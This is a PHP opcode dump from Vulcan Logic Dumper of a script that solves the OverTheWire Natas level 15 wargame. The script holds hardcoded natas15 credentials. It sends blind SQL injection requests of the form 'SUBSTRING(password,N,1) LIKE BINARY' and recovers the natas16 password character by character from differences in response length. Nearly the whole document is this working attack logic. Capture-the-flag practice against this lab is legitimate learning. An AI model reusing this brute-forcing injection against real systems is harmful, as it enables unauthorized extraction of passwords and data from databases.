Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 65
Branch analysis from position: 65
2 jumps found. (Code = 44) Position 1 = 67, Position 2 = 10
Branch analysis from position: 67
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 10
1 jumps found. (Code = 42) Position 1 = 62
Branch analysis from position: 62
2 jumps found. (Code = 44) Position 1 = 64, Position 2 = 12
Branch analysis from position: 64
2 jumps found. (Code = 44) Position 1 = 67, Position 2 = 10
Branch analysis from position: 67
Branch analysis from position: 10
Branch analysis from position: 12
2 jumps found. (Code = 43) Position 1 = 55, Position 2 = 61
Branch analysis from position: 55
2 jumps found. (Code = 44) Position 1 = 64, Position 2 = 12
Branch analysis from position: 64
Branch analysis from position: 12
Branch analysis from position: 61
filename: /in/M3saJ
function name: (null)
number of ops: 70
compiled vars: !0 = $chars, !1 = $credentials, !2 = $ch, !3 = $pass, !4 = $target, !5 = $needle, !6 = $xx, !7 = $yy, !8 = $char, !9 = $target2, !10 = $page
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
8 0 E > ASSIGN !0, '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
9 1 ASSIGN !1, 'natas15%3Am2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV'
10 2 INIT_FCALL_BY_NAME 'curl_init'
3 DO_FCALL 0 $13
4 ASSIGN !2, $13
11 5 ASSIGN !3, ''
12 6 ASSIGN !4, 'natas15.natas.labs.overthewire.org%2Findex.php'
13 7 ASSIGN !5, 'r+e'
14 8 ASSIGN !6, 1
9 > JMP ->65
15 10 > ASSIGN !7, 0
11 > JMP ->62
17 12 > INIT_FCALL 'substr'
13 SEND_VAR !0
14 SEND_VAR !7
15 SEND_VAL 1
16 DO_ICALL $20
17 ASSIGN !8, $20
18 18 ROPE_INIT 3 ~23 '%3Fusername%3Dnatas16%22+and+SUBSTRING%28password%2C'
19 ROPE_ADD 1 ~23 ~23, !6
20 ROPE_END 2 ~22 ~23, '%2C1%29+LIKE+BINARY+%22'
21 CONCAT ~25 !4, ~22
22 CONCAT ~26 ~25, !8
23 ASSIGN !9, ~26
19 24 CONCAT ~28 '%0A', !9
25 CONCAT ~29 ~28, '%0A'
26 ECHO ~29
20 27 INIT_FCALL_BY_NAME 'curl_setopt'
28 SEND_VAR_EX !2
29 FETCH_CONSTANT ~30 'CURLOPT_URL'
30 SEND_VAL_EX ~30
31 SEND_VAR_EX !9
32 DO_FCALL 0
21 33 INIT_FCALL_BY_NAME 'curl_setopt'
34 SEND_VAR_EX !2
35 FETCH_CONSTANT ~32 'CURLOPT_USERPWD'
36 SEND_VAL_EX ~32
37 SEND_VAR_EX !1
38 DO_FCALL 0
22 39 INIT_FCALL_BY_NAME 'curl_setopt'
40 SEND_VAR_EX !2
41 FETCH_CONSTANT ~34 'CURLOPT_RETURNTRANSFER'
42 SEND_VAL_EX ~34
43 SEND_VAL_EX <true>
44 DO_FCALL 0
23 45 INIT_FCALL_BY_NAME 'curl_exec'
46 SEND_VAR_EX !2
47 DO_FCALL 0 $36
48 ASSIGN !10, $36
24 49 STRLEN ~38 !10
50 CONCAT ~39 '%0A', ~38
51 ECHO ~39
25 52 STRLEN ~40 !10
53 IS_SMALLER ~40, 288
54 > JMPZ ~41, ->61
27 55 > CONCAT ~42 !3, !8
56 ASSIGN !3, ~42
28 57 CONCAT ~44 '%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0ALa+pass+per+ora+e%27%3A+', !3
58 CONCAT ~45 ~44, '%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A'
59 ECHO ~45
29 60 ASSIGN !7, 62
15 61 > PRE_INC !7
62 > IS_SMALLER !7, 62
63 > JMPNZ ~48, ->12
14 64 > PRE_INC !6
65 > IS_SMALLER !6, 33
66 > JMPNZ ~50, ->10
33 67 > CONCAT ~51 '%0ALa+password+e%27%3A+', !3
68 ECHO ~51
35 69 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0